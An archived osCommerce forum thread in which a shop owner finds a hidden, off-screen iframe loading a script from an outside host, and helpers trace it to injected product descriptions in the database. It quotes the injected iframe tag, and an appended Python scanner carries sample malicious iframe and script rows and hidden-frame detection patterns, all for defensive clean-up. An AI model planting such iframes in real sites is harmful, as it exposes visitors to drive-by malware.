Archived

This topic is now archived and is closed to further replies.

Raymee

<iframe -- Need advice

Hi

I have a few problems with virus / bad links loading with my website osCommerce shop, www.equorum.co.uk/Studshop (this links to a category list). Basically, according to the Firefox browser, it is downloading stuff from another site.

It seems to happen when people click an image in a listing to navigate to product information. Having a look through the source code of the displayed page I found "<iframe src='http://dubaicompanieshouse.com/wp-includes/script.php' id='aqldn' name='eisjf' width='257' height='282' style='position:absolute; left:-3608;'></iframe>", which obviously was alien to me and the site.

I have searched the product info file and many others to see if I could find where the <iframe> code gets in (basically I am looking for the term <iframe> in the PHP code) but so far without luck and indeed - if I can trust it - my web design software cannot find the term either in the website.

Any advice on how to clean the website or what to look for would be appreciated. Even if it is just look harder.

Raymond


Hackers obfuscate their code most of the time.

 

I would bet it looks like the code described here

 

It might not be at the top of the file though.


If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Thanks - I did a search for the term "eval" and got many hits, including where it was part of a word or part of a formula. However, none that looked like the link and none that was replicated on all PHP pages.

The other thing I find strange is that none of the file date stamps (except for images) seem to be recent. Most being 2008 when I set up the site. If I take the site down, reload a fresh copy of osCommerce and reload the database, will this solve the problem or will it still be there?

 

Regards


No it's not on all the pages.

 

Just on the product_info.php

 

If you post the code from the file I can probably spot the problem.

 

Taking the site down and reloading it will most likely get rid of the immediate problem.

 

What that probably won't fix is whatever security flaw allowed the code to be implanted in the first place.



After looking at the source code more closely, it looks to me like the rogue code is actually coming from the product descriptions stored in your DB.



Thanks, I will search that code again and load up also later - it's past 2am and my eyes need a rest. Re how it got there - probably 777, but I have now reduced this to 755, changed the admin folder name and changed the password on the directory listing.

 

Thanks again and I will post later in the morning.


I hope you didn't miss my last post.

 

Log into your admin and edit one of the products.

 

See what's in the product description.

 

I'm guessing that's where you'll find what you're looking for.

 

I've only seen the DB data compromised once before. Most of the time it's the PHP code that gets hacked.



I think you are right - I loaded an older copy of the product info file (held on the server under a different name) and while the display changed as I expected it didn't solve the problem.

 

I will have a look and see what is there.


Yes you were right it is in the database description.

 

I can probably go to a backup from before the problems started to happen.

 

But need to understand why it happened and what I can do. Since this happened I have changed the admin directory and password. Could the PC that is used to populate the shop be contributing?

Basically thank you for your help so far - further advice appreciated.

 

Regards
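
The check this thread arrived at (injected markup sitting in the stored product descriptions rather than in the PHP files), as an added example that is not part of the original posts. It parses each description as HTML instead of searching for a literal string, so upper-case tags are caught and words such as "evaluated" are not; an in-memory sqlite3 database stands in for the shop's MySQL database, the table and column names are osCommerce's `products_description`, and the rows and the `injected.example` host are constructed.

```python
import re
import sqlite3
from html.parser import HTMLParser

# Tags that have no business inside a product description.
ACTIVE_TAGS = {"iframe", "script", "object", "embed"}
# Styling that keeps a frame out of view: large negative offset or hidden display.
HIDDEN = re.compile(r"(left|top)\s*:\s*-\d{3,}|display\s*:\s*none|visibility\s*:\s*hidden", re.I)


class ActiveTagFinder(HTMLParser):
    """Collect (tag, src, hidden) for every active tag in an HTML fragment."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):  # tag and attribute names arrive lowercased
        if tag in ACTIVE_TAGS:
            a = {k: (v or "") for k, v in attrs}
            hidden = bool(HIDDEN.search(a.get("style", "")))
            self.hits.append((tag, a.get("src", ""), hidden))


def find_active_tags(html):
    finder = ActiveTagFinder()
    finder.feed(html)
    finder.close()
    return finder.hits


def scan_descriptions(conn):
    """Return [(products_id, tag, src, hidden)] for rows that contain active tags."""
    rows = conn.execute("SELECT products_id, products_description "
                        "FROM products_description ORDER BY products_id")
    return [(pid, *hit) for pid, text in rows for hit in find_active_tags(text or "")]


def demo_db():
    # Constructed sample rows; only the table and column names follow osCommerce.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products_description (products_id INTEGER, products_description TEXT)")
    conn.executemany("INSERT INTO products_description VALUES (?, ?)", [
        (1, "<p>Bay colt, evaluated by our vet in 2008.</p>"),
        (2, "<p>Grey mare</p><IFRAME SRC='http://injected.example/script.php' width='257' "
            "height='282' style='position:absolute; left:-3608;'></IFRAME>"),
        (3, "<b>Chestnut</b> <script src='//injected.example/x.js'></script>"),
    ])
    return conn
```

`scan_descriptions(demo_db())` lists the affected product ids, which tells you which rows to compare against a backup taken before the problem started.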


Sounds like a SQL injection attack to me.

 

All I can offer is the link below:

 

How to Secure Your Site

